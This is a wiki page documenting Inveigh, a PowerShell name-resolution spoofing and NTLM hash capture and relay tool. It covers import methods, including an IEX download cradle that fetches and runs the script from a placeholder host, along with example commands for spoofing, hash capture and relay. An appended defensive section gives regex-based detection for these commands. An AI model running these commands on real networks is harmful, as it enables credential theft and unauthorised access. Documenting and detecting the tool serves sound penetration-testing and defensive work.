Marwâne Chahed edited this page May 9, 2020 · 9 revisions

Import

  • Import with Import-Module
    Import-Module ./Inveigh.psd1

  • Import using the dot source method
    . ./Inveigh.ps1
    . ./Inveigh-Relay.ps1

  • Load into memory using Invoke-Expression
    IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")
    IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1")

System Requirements

  • Tested minimums are PowerShell 2.0 and .NET 3.5

Tips

  • If a local firewall is enabled, ensure that the targets are able to communicate with the Inveigh host on the relevant ports.
  • If you copy/paste challenge/response captures from the console window for password cracking, ensure that carriage returns are removed.

Defaults

Inveigh - elevated privilege mode enabled

Invoke-Inveigh

  • HTTP listener on port 80 with HTTP and WPAD authentication set to NTLM
  • LLMNR spoofer - packet sniffer version
  • SMB NTLMv1 and NTLMv2 challenge/response capture through the packet sniffer
  • Real time console and file outputs are disabled

Inveigh - elevated privilege mode disabled

Invoke-Inveigh

  • HTTP listener on port 80 with HTTP and WPAD authentication set to NTLM
  • LLMNR spoofer - UDP listener version (likely to be disabled at startup because Windows already has UDP port 5355 in use by default)
  • NBNS spoofer - UDP listener version
  • Real time console and file outputs are disabled

Inveigh-Relay

Invoke-InveighRelay -Target 192.168.1.100 -Command "do something"

  • HTTP listener on port 80 with HTTP and WPAD authentication set to NTLM
  • Running Inveigh modules will auto-exit after a successful relay
  • Target and Command parameters are mandatory
  • Real time console and file outputs are disabled

Support Functions

Both the Inveigh.ps1 and Inveigh-Relay.ps1 files contain identical support functions that permit data retrieval and interaction with the main Inveigh and Inveigh-Relay modules.

  • Clear-Inveigh - clear the $inveigh hashtable
  • Get-Inveigh - get data from the $inveigh hashtable
  • Stop-Inveigh - stop all running Inveigh modules
  • Watch-Inveigh - enable real time console output

Examples

  • Enable real time console output
    Invoke-Inveigh -ConsoleOutput Y

  • Enable inspection only and real time console output
    Invoke-Inveigh -Inspect -ConsoleOutput Y

  • Enable real time file output at startup
    Invoke-Inveigh -FileOutput Y

  • Enable the NBNS and mDNS spoofers
    Invoke-Inveigh -NBNS Y -mDNS Y

  • Enable HTTPS with customized certificate settings
    Invoke-Inveigh -HTTPS Y -HTTPSCertIssuer PowerShell -HTTPSCertSubject www

  • Enable proxy authentication captures
    Invoke-Inveigh -Proxy Y

  • Stop running Inveigh modules
    Stop-Inveigh

  • Get all queued console output
    Get-Inveigh

  • Get all captured NTLMv2 challenge/response hashes
    Get-Inveigh -NTLMv2
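
Detection

A defender-side view of the commands on this page, as an added example that is not part of Inveigh or this wiki: the function below flags PowerShell script block text that contains the import methods, cmdlets or $inveigh variable named above. The function name, rule names and sample script blocks are constructed for illustration.

```powershell
# Added example (not Inveigh code). Indicator names are taken from this page;
# the function name, rule names and sample script blocks are constructed here.
function Find-InveighIndicator {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$ScriptBlockText
    )
    begin {
        # Ordered so the output is stable: rule name -> regex (-match is case-insensitive).
        $rules = [ordered]@{
            ModuleFile     = 'Inveigh(-Relay)?\.ps(1|d1)\b'
            MainCmdlet     = '\bInvoke-Inveigh(Relay)?\b'
            SupportCmdlet  = '\b(Clear|Get|Stop|Watch)-Inveigh\b'
            DownloadCradle = '\b(IEX|Invoke-Expression)\b.*Net\.WebClient.*DownloadString'
            StateVariable  = '\$inveigh\b'
        }
    }
    process {
        # Backtick escapes (In`voke-Inveigh) split a token without changing what runs; drop them first.
        $normalized = $ScriptBlockText -replace '`', ''
        $hits = @(foreach ($name in $rules.Keys) {
            if ($normalized -match $rules[$name]) { $name }
        })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Rules = $hits -join ','
                Text  = $normalized.Trim()
            }
        }
    }
}

# Constructed samples, shaped like the ScriptBlockText field of a script block logging event.
$samples = @(
    'IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")'
    'Import-Module ./Inveigh.psd1; Invoke-Inveigh -ConsoleOutput Y'
    'In`voke-InveighRelay -Target 192.168.1.100 -Command "do something"'
    'Get-ChildItem C:\Windows | Sort-Object Length'
)
$samples | Find-InveighIndicator | Format-Table -AutoSize -Wrap
```

With script block logging enabled, the same function can be fed from event ID 4104 in the Microsoft-Windows-PowerShell/Operational log. Name matching only catches unmodified copies of the scripts, so treat a hit as a lead and pair it with network monitoring for unexpected LLMNR, NBNS and mDNS responders.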